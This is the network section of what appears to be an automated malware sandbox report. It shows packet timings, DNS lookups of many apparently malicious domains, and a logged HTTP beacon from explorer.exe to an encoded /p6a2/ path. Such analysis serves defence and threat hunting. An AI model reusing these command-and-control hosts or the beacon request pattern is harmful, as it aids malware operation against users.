                                                                                              Dec 27, 2022 10:56:26.153485060 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.419491053 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.421153069 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.421293974 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.688117027 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.692565918 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.692645073 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.692717075 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.692790031 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.692920923 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.692920923 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.692935944 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.692996979 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.693044901 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.693090916 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.693097115 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.693140984 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.693187952 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.693195105 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.693495035 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.958898067 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.958942890 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.958971024 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.958996058 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959024906 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959048986 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959076881 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959105968 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959132910 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959161997 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959181070 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959201097 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959219933 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959247112 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959258080 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.959295988 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959321022 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959342003 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959362984 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959367037 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.959387064 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.959389925 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959418058 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:26.959455013 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:26.959497929 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.227046013 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227119923 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227169037 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227216005 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227262974 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227309942 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227358103 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227407932 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227457047 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227497101 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.227505922 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227534056 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.227555037 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227560043 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.227603912 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227652073 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.227652073 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227704048 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227751970 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.227751970 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227802038 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227848053 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.227849960 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227900028 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227947950 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.227948904 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.227997065 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228046894 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228058100 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.228096008 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228137016 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.228144884 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228193045 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228241920 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228260994 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.228292942 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228338003 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.228343010 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228391886 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228436947 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.228441000 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228490114 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228549957 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.228558064 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228617907 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228666067 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228667021 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.228719950 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228781939 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228790045 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.228797913 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:27.228863001 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.229177952 CET4972680192.168.2.435.213.254.232
                                                                                              Dec 27, 2022 10:56:27.495038986 CET804972635.213.254.232192.168.2.4
                                                                                              Dec 27, 2022 10:56:32.231959105 CET4972780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:32.290786982 CET8049727194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:56:32.291014910 CET4972780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:32.316085100 CET4972780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:32.374994993 CET8049727194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:56:32.375020981 CET8049727194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:56:32.375039101 CET8049727194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:56:32.375178099 CET4972780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:33.825352907 CET4972780192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:34.841330051 CET4972880192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:34.903295040 CET8049728194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:56:34.904042959 CET4972880192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:34.904155970 CET4972880192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:34.966113091 CET8049728194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:56:34.966134071 CET8049728194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:56:34.966149092 CET8049728194.58.112.174192.168.2.4
                                                                                              Dec 27, 2022 10:56:34.966322899 CET4972880192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:34.966450930 CET4972880192.168.2.4194.58.112.174
                                                                                              Dec 27, 2022 10:56:35.037632942 CET8049728194.58.112.174192.168.2.4

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 27, 2022 10:54:06.458848953 CET5657253192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:54:06.482248068 CET53565728.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:54:17.604034901 CET5091153192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:54:17.763294935 CET53509118.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:54:25.580650091 CET5968353192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:54:25.605513096 CET53596838.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:54:34.623395920 CET6416753192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:54:34.645834923 CET53641678.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:54:42.864379883 CET5856553192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:54:43.052402973 CET53585658.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:54:51.102634907 CET5223953192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:54:51.273303986 CET53522398.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:54:59.372556925 CET5680753192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:54:59.395519018 CET53568078.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:55:07.009121895 CET6100753192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:55:07.227813005 CET53610078.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:55:15.335171938 CET6068653192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:55:15.469782114 CET53606868.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:55:23.560151100 CET6112453192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:55:23.887182951 CET53611248.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:55:32.139282942 CET5944453192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:55:32.230319977 CET53594448.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:55:41.639516115 CET5557053192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:55:41.984910011 CET53555708.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:55:50.060352087 CET6490653192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:55:50.100518942 CET53649068.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:55:58.501996040 CET5944653192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:55:58.565622091 CET53594468.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:56:06.313781977 CET5086153192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:56:06.338397026 CET53508618.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:56:08.374053955 CET6108853192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:56:08.427836895 CET53610888.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:56:10.831888914 CET5872953192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:56:10.860716105 CET53587298.8.8.8192.168.2.4
                                                                                              Dec 27, 2022 10:56:17.484354973 CET6470053192.168.2.48.8.8.8
                                                                                              Dec 27, 2022 10:56:17.517858982 CET53647008.8.8.8192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 27, 2022 10:54:06.458848953 CET192.168.2.48.8.8.80x6ccStandard query (0)www.adelaidesociety.comA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:17.604034901 CET192.168.2.48.8.8.80xac01Standard query (0)www.newhard.ruA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:25.580650091 CET192.168.2.48.8.8.80xaad8Standard query (0)www.loaddown.vipA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:34.623395920 CET192.168.2.48.8.8.80x914cStandard query (0)www.scastive.onlineA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:42.864379883 CET192.168.2.48.8.8.80xdcccStandard query (0)www.dubmoviedaaa.comA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:51.102634907 CET192.168.2.48.8.8.80x4451Standard query (0)www.elite-travel-cn.comA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:59.372556925 CET192.168.2.48.8.8.80x41f6Standard query (0)www.cobramierer.comA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:07.009121895 CET192.168.2.48.8.8.80x6b5aStandard query (0)www.byfuture.bizA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:15.335171938 CET192.168.2.48.8.8.80x8e4Standard query (0)www.forumhtc.comA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:23.560151100 CET192.168.2.48.8.8.80x4feeStandard query (0)www.3658622bet.comA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:32.139282942 CET192.168.2.48.8.8.80x8291Standard query (0)www.bip39chain.infoA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:41.639516115 CET192.168.2.48.8.8.80xd12Standard query (0)www.060jinbo.comA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:50.060352087 CET192.168.2.48.8.8.80x4514Standard query (0)www.realtxt.co.ukA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:58.501996040 CET192.168.2.48.8.8.80xf949Standard query (0)www.4tx.ruA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:06.313781977 CET192.168.2.48.8.8.80xb58dStandard query (0)www.hiufouwnwk.shopA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:08.374053955 CET192.168.2.48.8.8.80x28abStandard query (0)www.hiufouwnwk.shopA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:10.831888914 CET192.168.2.48.8.8.80x665bStandard query (0)www.hiufouwnwk.shopA (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:17.484354973 CET192.168.2.48.8.8.80xab3dStandard query (0)www.glb-mobility.comA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 27, 2022 10:54:06.482248068 CET8.8.8.8192.168.2.40x6ccNo error (0)www.adelaidesociety.com35.213.254.232A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:17.763294935 CET8.8.8.8192.168.2.40xac01No error (0)www.newhard.ru194.58.112.174A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:25.605513096 CET8.8.8.8192.168.2.40xaad8No error (0)www.loaddown.vip35.77.200.33A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:34.645834923 CET8.8.8.8192.168.2.40x914cNo error (0)www.scastive.online162.254.33.214A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:43.052402973 CET8.8.8.8192.168.2.40xdcccNo error (0)www.dubmoviedaaa.com64.225.91.73A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:51.273303986 CET8.8.8.8192.168.2.40x4451No error (0)www.elite-travel-cn.com107.149.40.247A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:54:59.395519018 CET8.8.8.8192.168.2.40x41f6No error (0)www.cobramierer.com176.28.33.25A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:07.227813005 CET8.8.8.8192.168.2.40x6b5aNo error (0)www.byfuture.biz146.148.102.201A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:15.469782114 CET8.8.8.8192.168.2.40x8e4No error (0)www.forumhtc.com166.88.175.130A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:23.887182951 CET8.8.8.8192.168.2.40x4feeNo error (0)www.3658622bet.com088-356.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:23.887182951 CET8.8.8.8192.168.2.40x4feeNo error (0)088-356.com185.224.170.82A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:32.230319977 CET8.8.8.8192.168.2.40x8291No error (0)www.bip39chain.infobip39chain.infoCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:32.230319977 CET8.8.8.8192.168.2.40x8291No error (0)bip39chain.info185.253.34.81A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:41.984910011 CET8.8.8.8192.168.2.40xd12No error (0)www.060jinbo.comsmart.https-t-me-okver.cdnv0.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:41.984910011 CET8.8.8.8192.168.2.40xd12No error (0)smart.https-t-me-okver.cdnv0.com64.64.253.213A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:41.984910011 CET8.8.8.8192.168.2.40xd12No error (0)smart.https-t-me-okver.cdnv0.com43.239.158.84A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:41.984910011 CET8.8.8.8192.168.2.40xd12No error (0)smart.https-t-me-okver.cdnv0.com91.149.222.189A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:50.100518942 CET8.8.8.8192.168.2.40x4514No error (0)www.realtxt.co.ukrealtxt.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:50.100518942 CET8.8.8.8192.168.2.40x4514No error (0)realtxt.co.uk192.46.208.151A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:55:58.565622091 CET8.8.8.8192.168.2.40xf949No error (0)www.4tx.ru141.8.195.124A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:06.338397026 CET8.8.8.8192.168.2.40xb58dNo error (0)www.hiufouwnwk.shop127.0.0.1A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:08.427836895 CET8.8.8.8192.168.2.40x28abNo error (0)www.hiufouwnwk.shop127.0.0.1A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:10.860716105 CET8.8.8.8192.168.2.40x665bNo error (0)www.hiufouwnwk.shop127.0.0.1A (IP address)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:17.517858982 CET8.8.8.8192.168.2.40xab3dNo error (0)www.glb-mobility.comglb-mobility.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Dec 27, 2022 10:56:17.517858982 CET8.8.8.8192.168.2.40xab3dNo error (0)glb-mobility.com88.99.217.197A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • www.adelaidesociety.com
                                                                                              • www.newhard.ru
                                                                                              • www.loaddown.vip
                                                                                              • www.scastive.online
                                                                                              • www.dubmoviedaaa.com
                                                                                              • www.elite-travel-cn.com
                                                                                              • www.cobramierer.com
                                                                                              • www.byfuture.biz
                                                                                              • www.forumhtc.com
                                                                                              • www.3658622bet.com
                                                                                              • www.bip39chain.info
                                                                                              • www.realtxt.co.uk
                                                                                              • www.4tx.ru
                                                                                              • www.glb-mobility.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.44969535.213.254.23280C:\Windows\explorer.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Dec 27, 2022 10:54:06.757294893 CET92OUTGET /p6a2/?4u=XXw8ZRfd0&PJsOe=pjY5HSUHAkIjJTnjTuXZqIQD+upstRzJTGdDpMtHb2G7EDTOYPy+SC0sAwePybO7Bg4lDq58C8rolUandfOM6VH00Jlr+bNPuQ== HTTP/1.1
                                                                                              Host: www.adelaidesociety.com
                                                                                              Connection: close
                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                              Data Ascii:
                                                                                              Dec 27, 2022 10:54:07.031235933 CET93INHTTP/1.1 404 Not Found
                                                                                              Server: nginx
                                                                                              Date: Tue, 27 Dec 2022 09:54:06 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              X-Httpd-Modphp: 1
                                                                                              Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                                              X-Proxy-Cache: MISS
                                                                                              X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                                                              Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62
                                                                                              Data Ascii: 8000<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex" /> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: relative; } .background-wrap.cloud-blue { b
                                                                                              Dec 27, 2022 10:54:07.031274080 CET95INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 77 68 69 74 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 7d
                                                                                              Data Ascii: ackground-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20px auto 10px; } .title--regular { font-family: 'Roboto', Arial,
                                                                                              Dec 27, 2022 10:54:07.031286955 CET96INData Raw: 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 62 73 74 72 61 63 74 2d 68 61 6c 66 2d 64 6f 74 2d 2d 63 69 72 63 6c 65 20 7b 20 6c 65 66 74 3a 20 30 3b 20 7d 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e
                                                                                              Data Ascii: ay: none; } .abstract-half-dot--circle { left: 0; } }</style></head><body> <div id="container"> <section class="error content background-wrap cloud-blue"> <div class="fit-wide"> <div class
